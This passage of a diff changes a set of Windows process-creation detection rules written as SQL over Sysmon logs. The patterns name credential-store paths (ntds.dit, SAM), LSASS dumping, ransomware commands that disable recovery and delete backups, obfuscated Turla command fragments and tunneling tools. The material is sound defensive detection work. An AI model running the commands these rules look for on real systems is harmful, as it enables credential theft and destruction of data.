"d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "title": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", + "id": "48917adc-a28e-4f5d-b729-11e75da8941f", "status": "experimental", - "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", - "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_uacme.yml" + "filename": "proc_creation_win_reg_defender_exclusion.yml" }, { - "title": "WannaCry Ransomware Activity", - "id": "41d40bff-377a-43e2-8e1b-2e543069e079", - "status": "test", - "description": "Detects WannaCry ransomware activity", - "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", + "title": "CL_Mutexverifiers.ps1 Proxy Execution", + "id": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "status": "experimental", + "description": "Detects the use of a Microsoft signed script to execute commands", + "author": "oscd.community, Natalia Shornikova, frack113", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "attack.discovery", - "attack.t1083", "attack.defense_evasion", - "attack.t1222.001", - "attack.impact", - "attack.t1486", - "attack.t1490" + "attack.t1216" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND CommandLine LIKE '%runAfterCancelProcess %' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_wannacry.yml" + "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml" }, { - "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", - "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", + "title": "PUA - Ngrok Execution", + "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "status": "test", - "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", - "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Another tool that uses the command line switches of Ngrok", + "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (Image LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_pua_ngrok.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", + "title": "Suspicious Control Panel DLL Load", + "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", + "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "title": "Delete Important Scheduled Task", + "id": "dbc1f800-0fe0-4bc0-9c66-292c2abe3f78", "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%/tn%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_schtasks_delete.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Turla Group Commands May 2020", + "id": "9e2e51c5-c699-4794-ba5a-29f5da40ac0c", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", + "description": "Detects commands used by Turla group as reported by ESET in May 2020", "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1204" + "attack.t1059.001", + "attack.t1053.005", + "attack.t1027" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%tracert -h 10 yahoo.com%' ESCAPE '\\' OR CommandLine LIKE '%.WSqmCons))|iex;%' ESCAPE '\\' OR CommandLine LIKE '%Fr`omBa`se6`4Str`ing%' ESCAPE '\\') OR (CommandLine LIKE '%net use https://docs.live.net%' ESCAPE '\\' AND CommandLine LIKE '%@aol.co.uk%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_apt_turla_comrat_may20.yml" }, { - "title": "Time Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Shells Spawned by Java", + "id": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", + "status": "experimental", + "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)", + "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Legitimate calls to system binaries", + "Company specific internal usage" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%build%' ESCAPE '\\' AND CommandLine LIKE '%build%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_java_susp_child_process_2.yml" }, { - "title": "Ilasm Lolbin Use Compile C-Sharp", - "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", + "title": "Install New Package Via Winget Local Manifest", + "id": "313d6012-51a0-4d93-8dfc-de8553239e25", "status": "experimental", - "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", - "author": "frack113", + "description": "Detects usage of winget to install applications via manifest file. Adversaries can abuse winget to download payloads remotely and execute them.\nThe manifest option enables you to install an application by passing in a YAML file directly to the client.\nWinget can be used to download and install exe, msi or msix files later.\n", + "author": "Sreeman, Florian Roth (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Some false positives are expected in some environment that may use this functionality to install and test their custom applications" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\') AND (CommandLine LIKE '%-m %' ESCAPE '\\' OR CommandLine LIKE '%--manifest%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ilasm.yml" + "filename": "proc_creation_win_winget_local_install_via_manifest.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Rundll32 UNC Path Execution", + "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "status": "experimental", + "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1021.002", + "attack.t1218.011" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_rundll32_unc_path.yml" }, { - "title": "Suspicious Diantz Download and Compress Into a CAB File", - "id": "185d7418-f250-42d0-b72e-0c8b70661e93", - "status": "experimental", - "description": "Download and compress a remote file and store it in a cab file on local machine.", - "author": "frack113", + "title": "Copying Sensitive Files with Credential Data", + "id": "e7be6119-fc37-43f0-ad4f-1f3f99be2f9f", + "status": "test", + "description": "Files with well-known filenames (sensitive files with credential data) copying", + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003", + "car.2013-07-001", + "attack.s0404" ], "falsepositives": [ - "Unknown" + "Copying sensitive files for legitimate use (eg. backup) or forensic investigation by legitimate incident responder or forensic invetigator" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\esentutl.exe' ESCAPE '\\') AND (CommandLine LIKE '%vss%' ESCAPE '\\' OR CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% /y %' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\system %' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\repair\\\\security%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\sam%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\system%' ESCAPE '\\' OR CommandLine LIKE '%\\\\config\\\\RegBack\\\\security%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" + "filename": "proc_creation_win_esentutl_sensitive_file_copy.yml" }, { - "title": "DllUnregisterServer Function Call Via Msiexec.EXE", - "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", + "title": "Suspicious CustomShellHost Execution", + "id": "84b14121-9d14-416e-800b-f3b829c5a14d", "status": "experimental", - "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", - "author": "frack113", + "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\CustomShellHost.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_dll.yml" + "filename": "proc_creation_win_lolbin_customshellhost.yml" }, { - "title": "Weak or Abused Passwords In CLI", - "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "title": "Renamed PsExec Service Execution", + "id": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", "status": "experimental", - "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. An example would be a threat actor creating a new user via the net command and providing the password inline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution" ], "falsepositives": [ - "Legitimate usage of the passwords by users via commandline (should be discouraged)", - "Other currently unknown false positives" + "Legitimate administrative tasks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'psexesvc.exe' AND NOT (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" + "filename": "proc_creation_win_renamed_sysinternals_psexec_service.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "title": "Potential Dridex Activity", + "id": "e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", "status": "stable", - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.005" + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Remote Access Tool - RURAT Execution From Unusual Location", - "id": "e01fa958-6893-41d4-ae03-182477c5e77d", - "status": "experimental", - "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sysprep on AppData Folder", + "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", + "status": "test", + "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml" + "filename": "proc_creation_win_sysprep_appdata.yml" }, { - "title": "Use of Wfc.exe", - "id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "title": "Replace.exe Usage", + "id": "9292293b-8496-4715-9db6-37028dcda4b3", "status": "experimental", - "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects the use of Replace.exe which can be used to replace file with another file", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate use by a software developer" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\replace.exe' ESCAPE '\\' AND (CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE 